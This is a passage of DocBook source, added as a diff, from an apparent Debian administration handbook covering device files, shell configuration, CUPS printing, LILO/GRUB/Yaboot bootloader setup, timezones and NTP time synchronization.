+		 <indexterm>
+			<primary>character, mode</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>special, file</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>mknod</command></primary>
+		</indexterm>
+		 <para>
+			Each hardware peripheral device is represented under Unix with a special file, usually stored in the file tree under <filename>/dev/</filename> (DEVices). Two types of special files exist according to the nature of the device: “character mode” and “block mode” files, each mode allowing for only a limited number of operations. While character mode limits interaction with read/write operations, block mode also allows seeking within the available data. Finally, each special file is associated with two numbers (“major” and “minor”) that identify the device to the kernel in a unique manner. Such a file, created by the <command>mknod</command> command, simply contains a symbolic (and more human-friendly) name.
+		</para>
+		 <para>
+			The permissions of a special file map to the permissions necessary to access the device itself. Thus, a file such as <filename>/dev/mixer</filename>, representing the audio mixer, only has read/write permissions for the root user and members of the <literal>audio</literal> group. Only these users can operate the audio mixer.
+		</para>
+		 <para>
+			It should be noted that the combination of <emphasis role="pkg">udev</emphasis>, <emphasis role="pkg">consolekit</emphasis> and <emphasis role="pkg">policykit</emphasis> can add additional permissions to allow users physically connected to the console (and not through the network) to access to certain devices.
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.shell-environment">
+		<title>Shell Environment</title>
+		 <para>
+			Command interpreters (or shells) can be a user's first point of contact with the computer, and they must therefore be rather friendly. Most of them use initialization scripts that allow configuration of their behavior (automatic completion, prompt text, etc.).
+		</para>
+		 <indexterm>
+			<primary>command line interface</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>command interpreter</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>shell</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>bash</command></primary>
+		</indexterm>
+		 <para>
+			<command>bash</command>, the standard shell, uses the <filename>/etc/bash.bashrc</filename> initialization script for “interactive” shells, and <filename>/etc/profile</filename> for “login” shells.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Login shell and (non) interactive shell</title>
+		 <para>
+			In simple terms, a login shell is invoked when you login to the console either locally or remotely via <command>ssh</command>, or when you run an explicit <command>bash --login</command> command. Regardless of whether it is a login shell or not, a shell can be interactive (in an <command>xterm</command>-type terminal for instance); or non-interactive (when executing a script).
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>DISCOVERY</emphasis> Other shells, other scripts</title>
+		 <para>
+			Each command interpreter has a specific syntax and its own configuration files. Thus, <command>zsh</command> uses <filename>/etc/zshrc</filename> and <filename>/etc/zshenv</filename>; <command>tcsh</command> uses <filename>/etc/csh.cshrc</filename>, <filename>/etc/csh.login</filename> and <filename>/etc/csh.logout</filename>. The man pages for these programs document which files they use.
+		</para>
+		 <indexterm>
+			<primary><command>zsh</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>tcsh</command></primary>
+		</indexterm>
+		 </sidebar> <para>
+			For <command>bash</command>, it is useful to activate “automatic completion” in the <filename>/etc/bash.bashrc</filename> file (simply uncomment a few lines).
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Automatic completion</title>
+		 <indexterm>
+			<primary>automatic completion</primary>
+		</indexterm>
+		 <para>
+			Many command interpreters provide a completion feature, which allows the shell to automatically complete a partially typed command name or argument when the user hits the <keycap>Tab</keycap> key. This lets users work more efficiently and be less error-prone.
+		</para>
+		 <para>
+			This function is very powerful and flexible. It is possible to configure its behavior according to each command. Thus, the first argument following <command>apt</command> will be proposed according to the syntax of this command, even if it does not match any file (in this case, the possible choices are <literal>install</literal>, <literal>remove</literal>, <literal>upgrade</literal>, etc.).
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> The tilde, a shortcut to HOME</title>
+		 <indexterm>
+			<primary>~</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>tilde</primary>
+		</indexterm>
+		 <para>
+			The tilde is often used to indicate the directory to which the environment variable, <varname>HOME</varname>, points (being the user's home directory, such as <filename>/home/rhertzog/</filename>). Command interpreters automatically make the substitution: <filename>~/hello.txt</filename> becomes <filename>/home/rhertzog/hello.txt</filename>.
+		</para>
+		 <para>
+			The tilde also allows access to another user's home directory. Thus, <filename>~rmas/bonjour.txt</filename> is synonymous with <filename>/home/rmas/bonjour.txt</filename>.
+		</para>
+		 </sidebar> <para>
+			In addition to these common scripts, each user can create their own <filename>~/.bashrc</filename> and <filename>~/.bash_profile</filename> to configure their shell. The most common changes are the addition of aliases; these are words that are automatically replaced with the execution of a command, which makes it faster to invoke that command. For instance, you could create the <literal>la</literal> alias for the command <command>ls -la | less</command> command; then you only have to type <command>la</command> to inspect the contents of a directory in detail.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Environment variables</title>
+		 <indexterm>
+			<primary>environment</primary>
+			<secondary>environment variable</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>variable, environment</primary>
+		</indexterm>
+		 <para>
+			Environment variables allow storage of global settings for the shell or various other programs called. They are contextual (each process has its own set of environment variables) but inheritable. This last characteristic offers the possibility for a login shell to declare variables which will be passed down to all programs it executes.
+		</para>
+		 </sidebar> <para>
+			Setting default environment variables is an important element of shell configuration. Leaving aside the variables specific to a shell, it is preferable to place them in the <filename>/etc/environment</filename> file, since it is used by the various programs likely to initiate a shell session. Variables typically defined there include <varname>ORGANIZATION</varname>, which usually contains the name of the company or organization, and <varname>HTTP_PROXY</varname>, which indicates the existence and location of an HTTP proxy.
+		</para>
+		 <sidebar> <title><emphasis>TIP</emphasis> All shells configured identically</title>
+		 <para>
+			Users often want to configure their login and interactive shells in the same way. To do this, they choose to interpret (or “source”) the content from <filename>~/.bashrc</filename> in the <filename>~/.bash_profile</filename> file. It is possible to do the same with files common to all users (by calling <filename>/etc/bash.bashrc</filename> from <filename>/etc/profile</filename>).
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.config-printing">
+		<title>Printer Configuration</title>
+		 <indexterm>
+			<primary>configuration</primary>
+			<secondary>printing</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>printing</primary>
+			<secondary>configuration</secondary>
+		</indexterm>
+		 <para>
+			Printer configuration used to cause a great many headaches for administrators and users alike. These headaches are now mostly a thing of the past, thanks to <emphasis role="pkg">cups</emphasis>, the free print server using the IPP protocol (Internet Printing Protocol).
+		</para>
+		 <indexterm>
+			<primary>IPP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Internet Printing Protocol</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>cups</command></primary>
+		</indexterm>
+		 <para>
+			This program is divided over several Debian packages: <emphasis role="pkg">cups</emphasis> is the central print server; <emphasis role="pkg">cups-bsd</emphasis> is a compatibility layer allowing use of commands from the traditional BSD printing system (<command>lpd</command> daemon, <command>lpr</command> and <command>lpq</command> commands, etc.); <emphasis role="pkg">cups-client</emphasis> contains a group of programs to interact with the server (block or unblock a printer, view or delete print jobs in progress, etc.); and finally, <emphasis role="pkg">printer-driver-gutenprint</emphasis> contains a collection of additional printer drivers for <command>cups</command>.
+		</para>
+		 <indexterm>
+			<primary><command>lpr</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>lpd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>lpq</command></primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>COMMUNITY</emphasis> CUPS</title>
+		 <indexterm>
+			<primary>CUPS</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Common Unix Printing System</primary>
+		</indexterm>
+		 <para>
+			CUPS (Common Unix Printing System) is a project (and a trademark) managed by Apple, Inc. <ulink type="block" url="http://www.cups.org/" />
+		</para>
+		 </sidebar> <para>
+			After installation of these different packages, <command>cups</command> is administered easily through a web interface accessible at the local address: <literal>http://localhost:631/</literal>. There you can add printers (including network printers), remove, and administer them. You can also administer <command>cups</command> with the graphical interface provided by the desktop environment. Finally, there is also the <command>system-config-printer</command> graphical interface (from the Debian package of the same name).
+		</para>
+		 <indexterm>
+			<primary><command>cups</command></primary>
+			<secondary>administration</secondary>
+		</indexterm>
+		 <sidebar> <title><emphasis>NOTE</emphasis> Obsolescence of <filename>/etc/printcap</filename></title>
+		 <para>
+			<emphasis>cups</emphasis> no longer uses the <filename>/etc/printcap</filename> file, which is now obsolete. Programs that rely upon this file to get a list of available printers will, thus, fail. To avoid this problem, delete this file and make it a symbolic link (see sidebar <xref linkend="sidebar.symbolic-link" />) to <filename>/run/cups/printcap</filename>, which is maintained by <emphasis>cups</emphasis> to ensure compatibility.
+		</para>
+		 <indexterm>
+			<primary><filename>printcap</filename></primary>
+		</indexterm>
+		 </sidebar>
+	</section>
+	 <section id="sect.config-bootloader">
+		<title>Configuring the Bootloader</title>
+		 <indexterm>
+			<primary>loader</primary>
+			<secondary>bootloader</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>bootloader</primary>
+		</indexterm>
+		 <para>
+			It is probably already functional, but it is always good to know how to configure and install the bootloader in case it disappears from the Master Boot Record. This can occur after installation of another operating system, such as Windows. The following information can also help you to modify the bootloader configuration if needed.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Master boot record</title>
+		 <indexterm>
+			<primary>MBR</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Master Boot Record</primary>
+		</indexterm>
+		 <para>
+			The Master Boot Record (MBR) occupies the first 512 bytes of the first hard disk, and is the first thing loaded by the BIOS to hand over control to a program capable of booting the desired operating system. In general, a bootloader gets installed in the MBR, removing its previous content.
+		</para>
+		 </sidebar> <section id="sect.identify-disks">
+			<title>Identifying the Disks</title>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> <emphasis>udev</emphasis> and <filename>/dev/</filename></title>
+			 <para>
+				The <filename>/dev/</filename> directory traditionally houses so-called “special” files, intended to represent system peripherals (see sidebar <xref linkend="sidebar.special-files" />). Once upon a time, it used to contain all special files that could potentially be used. This approach had a number of drawbacks among which the fact that it restricted the number of devices that one could use (due to the hardcoded list of names), and that it was impossible to know which special files were actually useful.
+			</para>
+			 <para>
+				Nowadays, the management of special files is entirely dynamic and matches better the nature of hot-swappable computer devices. The kernel cooperates with <emphasis>udev</emphasis> to create and delete them as needed when the corresponding devices appear and disappear. For this reason, <filename>/dev/</filename> doesn't need to be persistent and is thus a RAM-based filesystem that starts empty and contains only the relevant entries.
+			</para>
+			 <para>
+				The kernel communicates lots of information about any newly added device and hands out a pair of major/minor numbers to identify it. With this <command>udevd</command> can create the special file under the name and with the permissions that it wants. It can also create aliases and perform additional actions (such as initialization or registration tasks). <command>udevd</command>'s behavior is driven by a large set of (customizable) rules.
+			</para>
+			 <para>
+				With dynamically assigned names, you can thus keep the same name for a given device, regardless of the connector used or the connection order, which is especially useful when you use various USB peripherals. The first partition on the first hard drive can then be called <filename>/dev/sda1</filename> for backwards compatibility, or <filename>/dev/root-partition</filename> if you prefer, or even both at the same time since <command>udevd</command> can be configured to automatically create a symbolic link.
+			</para>
+			 <para>
+				In ancient times, some kernel modules did automatically load when you tried to access the corresponding device file. This is no longer the case, and the peripheral's special file no longer exists prior to loading the module; this is no big deal, since most modules are loaded on boot thanks to automatic hardware detection. But for undetectable peripherals (such as very old disk drives or PS/2 mice), this doesn't work. Consider adding the modules, <literal>floppy</literal>, <literal>psmouse</literal> and <literal>mousedev</literal> to <filename>/etc/modules</filename> in order to force loading them on boot.
+			</para>
+			 </sidebar> <indexterm>
+				<primary>hard drive, names</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>names</primary>
+				<secondary>of hard drives</secondary>
+			</indexterm>
+			 <para>
+				Configuration of the bootloader must identify the different hard drives and their partitions. Linux uses “block” special files stored in the <filename>/dev/</filename> directory, for this purpose. Since Debian <emphasis role="distribution">Squeeze</emphasis>, the naming scheme for hard drives has been unified by the Linux kernel, and all hard drives (IDE/PATA, SATA, SCSI, USB, IEEE 1394) are now represented by <filename>/dev/sd*</filename>.
+			</para>
+			 <para>
+				Each partition is represented by its number on the disk on which it resides: for instance, <filename>/dev/sda1</filename> is the first partition on the first disk, and <filename>/dev/sdb3</filename> is the third partition on the second disk.
+			</para>
+			 <indexterm>
+				<primary>partition</primary>
+				<secondary>primary</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>partition</primary>
+				<secondary>extended</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>partition</primary>
+				<secondary>secondary</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>partition table</primary>
+				<secondary>MS-DOS format</secondary>
+			</indexterm>
+			 <para>
+				The PC architecture (or “i386”, including its younger cousin “amd64”) has long been limited to using the “MS-DOS” partition table format, which only allows four “primary” partitions per disk. To go beyond this limitation under this scheme, one of them has to be created as an “extended” partition, and it can then contain additional “secondary” partitions. These secondary partitions are numbered from 5. Thus the first secondary partition could be <filename>/dev/sda5</filename>, followed by <filename>/dev/sda6</filename>, etc.
+			</para>
+			 <para>
+				Another restriction of the MS-DOS partition table format is that it only allows disks up to 2 TiB in size, which is becoming a real problem with recent disks.
+			</para>
+			 <indexterm>
+				<primary>GPT</primary>
+				<secondary>partition table format</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>partition table</primary>
+				<secondary>GPT format</secondary>
+			</indexterm>
+			 <para>
+				A new partition table format called GPT loosens these constraints on the number of partitions (it allows up to 128 partitions when using standard settings) and on the size of the disks (up to 8 ZiB, which is more than 8 billion terabytes). If you intend to create many physical partitions on the same disk, you should therefore ensure that you are creating the partition table in the GPT format when partitioning your disk.
+			</para>
+			 <para>
+				It is not always easy to remember what disk is connected to which SATA controller, or in third position in the SCSI chain, especially since the naming of hotplugged hard drives (which includes among others most SATA disks and external disks) can change from one boot to another. Fortunately, <command>udev</command> creates, in addition to <filename>/dev/sd*</filename>, symbolic links with a fixed name, which you could then use if you wished to identify a hard drive in a non-ambiguous manner. These symbolic links are stored in <filename>/dev/disk/by-id</filename>. On a machine with two physical disks, for example, one could find the following:
+			</para>
+			 
+<screen><computeroutput>mirexpress:/dev/disk/by-id# </computeroutput><userinput>ls -l
+</userinput><computeroutput>total 0
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0 -&gt; ../../sdc
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part1 -&gt; ../../sdc1
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part2 -&gt; ../../sdc2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 wwn-0x5000c50015c4842f -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 wwn-0x5000c50015c4842f-part1 -&gt; ../../sda1
+[...]
+mirexpress:/dev/disk/by-id# </computeroutput></screen>
+			 <para>
+				Note that some disks are listed several times (because they behave simultaneously as ATA disks and SCSI disks), but the relevant information is mainly in the model and serial numbers of the disks, from which you can find the peripheral file.
+			</para>
+			 <para>
+				The example configuration files given in the following sections are based on the same setup: a single SATA disk, where the first partition is an old Windows installation and the second contains Debian GNU/Linux.
+			</para>
+
+		</section>
+		 <section id="sect.config-lilo">
+			<title>Configuring LILO</title>
+			 <indexterm>
+				<primary>LILO</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Linux Loader</primary>
+			</indexterm>
+			 <para>
+				<emphasis>LILO</emphasis> (LInux LOader) is the oldest bootloader — solid but rustic. It writes the physical address of the kernel to boot on the MBR, which is why each update to LILO (or its configuration file) must be followed by the command <command>lilo</command>. Forgetting to do so will render a system unable to boot if the old kernel was removed or replaced as the new one will not be in the same location on the disk.
+			</para>
+			 <para>
+				LILO's configuration file is <filename>/etc/lilo.conf</filename>; a simple file for standard configuration is illustrated in the example below.
+			</para>
+			 <example id="example.lilo.conf">
+				<title>LILO configuration file</title>
+				 
+<programlisting>
+# The disk on which LILO should be installed.
+# By indicating the disk and not a partition.
+# you order LILO to be installed on the MBR.
+boot=/dev/sda
+# the partition that contains Debian
+root=/dev/sda2
+# the item to be loaded by default
+default=Linux
+
+# the most recent kernel image
+image=/vmlinuz
+  label=Linux
+  initrd=/initrd.img
+  read-only
+
+# Old kernel (if the newly installed kernel doesn't boot)
+image=/vmlinuz.old
+  label=LinuxOLD
+  initrd=/initrd.img.old
+  read-only
+  optional
+
+# only for Linux/Windows dual boot
+other=/dev/sda1
+  label=Windows
+</programlisting>
+
+			</example>
+
+		</section>
+		 <section id="sect.config-grub">
+			<title>GRUB 2 Configuration</title>
+			 <indexterm>
+				<primary>GRUB</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>GRUB 2</primary>
+			</indexterm>
+			 <para>
+				<emphasis>GRUB</emphasis> (GRand Unified Bootloader) is more recent. It is not necessary to invoke it after each update of the kernel; <emphasis>GRUB</emphasis> knows how to read the filesystems and find the position of the kernel on the disk by itself. To install it on the MBR of the first disk, simply type <command>grub-install /dev/sda</command>. <indexterm><primary><command>grub-install</command></primary></indexterm>
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Disk names for GRUB</title>
+			 <para>
+				GRUB can only identify hard drives based on information provided by the BIOS. <literal>(hd0)</literal> corresponds to the first disk thus detected, <literal>(hd1)</literal> the second, etc. In most cases, this order corresponds exactly to the usual order of disks under Linux, but problems can occur when you associate SCSI and IDE disks. GRUB stores correspondences that it detects in the file <filename>/boot/grub/device.map</filename>. If you find errors there (because you know that your BIOS detects drives in a different order), correct them manually and run <command>grub-install</command> again. <command>grub-mkdevicemap</command> can help creating a <filename>device.map</filename> file from which to start.
+			</para>
+			 <para>
+				Partitions also have a specific name in GRUB. When you use “classical” partitions in MS-DOS format, the first partition on the first disk is labeled, <literal>(hd0,msdos1)</literal>, the second <literal>(hd0,msdos2)</literal>, etc.
+			</para>
+			 </sidebar> <para>
+				GRUB 2 configuration is stored in <filename>/boot/grub/grub.cfg</filename>, but this file (in Debian) is generated from others. Be careful not to modify it by hand, since such local modifications will be lost the next time <command>update-grub</command> is run (which may occur upon update of various packages). The most common modifications of the <filename>/boot/grub/grub.cfg</filename> file (to add command line parameters to the kernel or change the duration that the menu is displayed, for example) are made through the variables in <filename>/etc/default/grub</filename>. To add entries to the menu, you can either create a <filename>/boot/grub/custom.cfg</filename> file or modify the <filename>/etc/grub.d/40_custom</filename> file. For more complex configurations, you can modify other files in <filename>/etc/grub.d</filename>, or add to them; these scripts should return configuration snippets, possibly by making use of external programs. These scripts are the ones that will update the list of kernels to boot: <filename>10_linux</filename> takes into consideration the installed Linux kernels; <filename>20_linux_xen</filename> takes into account Xen virtual systems, and <filename>30_os-prober</filename> lists other operating systems (Windows, OS X, Hurd).
+			</para>
+
+		</section>
+		 <section id="sect.config-yaboot">
+			<title>For Macintosh Computers (PowerPC): Configuring Yaboot</title>
+			 <indexterm>
+				<primary><command>yaboot</command></primary>
+			</indexterm>
+			 <para>
+				Yaboot is the bootloader used by old Macintosh computers using PowerPC processors. They do not boot like PCs, but rely on a “bootstrap” partition, from which the BIOS (or OpenFirmware) executes the loader, and on which the <command>ybin</command> program installs <command>yaboot</command> and its configuration file. You will only need to run this command again if the <filename>/etc/yaboot.conf</filename> is modified (it is duplicated on the bootstrap partition, and <command>yaboot</command> knows how to find the position of the kernels on the disks).
+			</para>
+			 <para>
+				Before executing <command>ybin</command>, you must first have a valid <filename>/etc/yaboot.conf</filename>. The following is an example of a minimal configuration. <indexterm><primary><command>ybin</command></primary></indexterm>
+			</para>
+			 <example id="example.yaboot.conf">
+				<title>Yaboot configuration file</title>
+				 
+<programlisting>
+# bootstrap partition
+boot=/dev/sda2
+# the disk
+device=hd:
+# the Linux partition
+partition=3
+root=/dev/sda3
+# boot after 3 seconds of inactivity
+# (timeout is in tenths of seconds)
+timeout=30
+
+install=/usr/lib/yaboot/yaboot
+magicboot=/usr/lib/yaboot/ofboot
+enablecdboot
+
+# last kernel installed
+image=/vmlinux
+        label=linux
+        initrd=/initrd.img
+        read-only
+
+# old kernel
+image=/vmlinux.old
+        label=old
+        initrd=/initrd.img.old
+        read-only
+
+# only for Linux/Mac OSX dual-boot
+macosx=/dev/sda5
+
+# bsd=/dev/sdaX and macos=/dev/sdaX
+# are also possible
+</programlisting>
+
+			</example>
+
+		</section>
+
+	</section>
+	 <section id="sect.config-misc">
+		<title>Other Configurations: Time Synchronization, Logs, Sharing Access…</title>
+		 <para>
+			The many elements listed in this section are good to know for anyone who wants to master all aspects of configuration of the GNU/Linux system. They are, however, treated briefly and frequently refer to the documentation.
+		</para>
+		 <section id="sect.timezone">
+			<title>Timezone</title>
+			 <indexterm>
+				<primary>timezone</primary>
+			</indexterm>
+			 <sidebar id="sidebar.symbolic-link"> <title><emphasis>BACK TO BASICS</emphasis> Symbolic links</title>
+			 <indexterm>
+				<primary>link</primary>
+				<secondary>symbolic</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>symbolic link</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>ln</command></primary>
+			</indexterm>
+			 <para>
+				A symbolic link is a pointer to another file. When you access it, the file to which it points is opened. Removal of the link will not cause deletion of the file to which it points. Likewise, it does not have its own set of permissions, but rather retains the permissions of its target. Finally, it can point to any type of file: directories, special files (sockets, named pipes, device files, etc.), even other symbolic links.
+			</para>
+			 <para>
+				The <command>ln -s <replaceable>target</replaceable> <replaceable>link-name</replaceable></command> command creates a symbolic link, named <replaceable>link-name</replaceable>, pointing to <replaceable>target</replaceable>.
+			</para>
+			 <para>
+				If the target does not exist, then the link is “broken” and accessing it will result in an error indicating that the target file does not exist. If the link points to another link, you will have a “chain” of links that turns into a “cycle” if one of the targets points to one of its predecessors. In this case, accessing one of the links in the cycle will result in a specific error (“too many levels of symbolic links”); this means the kernel gave up after several rounds of the cycle.
+			</para>
+			 </sidebar> <para>
+				The timezone, configured during initial installation, is a configuration item for the <emphasis role="pkg">tzdata</emphasis> package. To modify it, use the <command>dpkg-reconfigure tzdata</command> command, which allows you to choose the timezone to be used in an interactive manner. Its configuration is stored in the <filename>/etc/timezone</filename> file. Additionally, the corresponding file in the <filename>/usr/share/zoneinfo</filename> directory is copied into <filename>/etc/localtime</filename>; this file contains the rules governing the dates where daylight saving time is active, for countries that use it.
+			</para>
+			 <indexterm>
+				<primary><filename>timezone</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/timezone</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>zoneinfo</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/usr/share/zoneinfo/</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>DST</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>daylight saving time</primary>
+			</indexterm>
+			 <para>
+				When you need to temporarily change the timezone, use the <varname>TZ</varname> environment variable, which takes priority over the configured system default:
+			</para>
+			 <indexterm>
+				<primary><varname>TZ</varname></primary>
+			</indexterm>
+			 
+<screen id="screen.tz">
+<computeroutput>$ </computeroutput><userinput>date</userinput>
+<computeroutput>Thu Feb 19 11:25:18 CET 2015</computeroutput>
+<computeroutput>$ </computeroutput><userinput>TZ="Pacific/Honolulu" date</userinput>
+<computeroutput>Thu Feb 19 00:25:21 HST 2015</computeroutput></screen>
+			 <sidebar> <title><emphasis>NOTE</emphasis> System clock, hardware clock</title>
+			 <para>
+				There are two time sources in a computer. A computer's motherboard has a hardware clock, called the “CMOS clock”. This clock is not very precise, and provides rather slow access times. The operating system kernel has its own, the software clock, which it keeps up to date with its own means (possibly with the help of time servers, see <xref linkend="sect.time-synchronization" />). This system clock is generally more accurate, especially since it doesn't need access to hardware variables. However, since it only exists in live memory, it is zeroed out every time the machine is booted, contrary to the CMOS clock, which has a battery and therefore “survives” rebooting or halting of the machine. The system clock is, thus, set from the CMOS clock during boot, and the CMOS clock is updated on shutdown (to take into account possible changes or corrections if it has been improperly adjusted).
+			</para>
+			 <para>
+				In practice, there is a problem, since the CMOS clock is nothing more than a counter and contains no information regarding the time zone. There is a choice to make regarding its interpretation: either the system considers it runs in universal time (UTC, formerly GMT), or in local time. This choice could be a simple shift, but things are actually more complicated: as a result of daylight saving time, this offset is not constant. The result is that the system has no way to determine whether the offset is correct, especially around periods of time change. Since it is always possible to reconstruct local time from universal time and the timezone information, we strongly recommend using the CMOS clock in universal time.
+			</para>
+			 <para>
+				Unfortunately, Windows systems in their default configuration ignore this recommendation; they keep the CMOS clock on local time, applying time changes when booting the computer by trying to guess during time changes if the change has already been applied or not. This works relatively well, as long as the system has only Windows running on it. But when a computer has several systems (whether it be a “dual-boot” configuration or running other systems via virtual machine), chaos ensues, with no means to determine if the time is correct. If you absolutely must retain Windows on a computer, you should either configure it to keep the CMOS clock as UTC (setting the registry key <literal>HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation\RealTimeIsUniversal</literal> to “1” as a DWORD), or use <command>hwclock --localtime --set</command> on the Debian system to set the hardware clock and mark it as tracking the local time (and make sure to manually check your clock in spring and autumn).
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.time-synchronization">
+			<title>Time Synchronization</title>
+			 <indexterm>
+				<primary>time synchronization</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>clock</primary>
+				<secondary>synchronization</secondary>
+			</indexterm>
+			 <para>
+				Time synchronization, which may seem superfluous on a computer, is very important on a network. Since users do not have permissions allowing them to modify the date and time, it is important for this information to be precise to prevent confusion. Furthermore, having all of the computers on a network synchronized allows better cross-referencing of information from logs on different machines. Thus, in the event of an attack, it is easier to reconstruct the chronological sequence of actions on the various machines involved in the compromise. Data collected on several machines for statistical purposes won't make a great deal of sense if they are not synchronized.
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> NTP</title>
+			 <indexterm>
+				<primary>NTP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Network</primary>
+				<secondary>Time Protocol</secondary>
+			</indexterm>
+			 <para>
+				NTP (Network Time Protocol) allows a machine to synchronize with others fairly accurately, taking into consideration the delays induced by the transfer of information over the network and other possible offsets.
+			</para>
+			 <para>
+				While there are numerous NTP servers on the Internet, the more popular ones may be overloaded. This is why we recommend using the <emphasis>pool.ntp.org</emphasis> NTP server, which is, in reality, a group of machines that have agreed to serve as public NTP servers. You could even limit use to a sub-group specific to a country, with, for example, <emphasis>us.pool.ntp.org</emphasis> for the United States, or <emphasis>ca.pool.ntp.org</emphasis> for Canada, etc.
+			</para>
+			 <para>
+				However, if you manage a large network, it is recommended that you install your own NTP server, which will synchronize with the public servers. In this case, all the other machines on your network can use your internal NTP server instead of increasing the load on the public servers. You will also increase homogeneity with your clocks, since all the machines will be synchronized on the same source, and this source is very close in terms of network transfer times.
+			</para>
+			 </sidebar> <section id="sect.ntp-on-workstations">
+				<title>For Workstations</title>
+				 <para>
+					Since work stations are regularly rebooted (even if only to save energy), synchronizing them by NTP at boot is enough. To do so, simply install the <emphasis role="pkg">ntpdate</emphasis> package. You can change the NTP server used if needed by modifying the <filename>/etc/default/ntpdate</filename> file.
+				</para>
+				 <indexterm>
+					<primary><filename>ntpdate</filename></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><filename>/etc/default/ntpdate</filename></primary>
+				</indexterm>
+
+			</section>
+			 <section id="sect.ntp-on-servers">
+				<title>For Servers</title>
+				 <para>
+					Servers are only rarely rebooted, and it is very important for their system time to be correct. To permanently maintain correct time, you would install a local NTP server, a service offered in the <emphasis role="pkg">ntp</emphasis> package. In its default configuration, the server will synchronize with <emphasis>pool.ntp.org</emphasis> and provide time in response to requests coming from the local network. You can configure it by editing the <filename>/etc/ntp.conf</filename> file, the most significant alteration being the NTP server to which it refers. If the network has a lot of servers, it may be interesting to have one local time server which synchronizes with the public servers and is used as a time source by the other servers of the network.
+				</para>
+				 <indexterm>
+					<primary><emphasis role="pkg">ntp</emphasis></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>server</primary>
+					<secondary>NTP</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>NTP</primary>
+					<secondary>server</secondary>
+				</indexterm>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> GPS modules and other time sources</title>
+				 <indexterm>
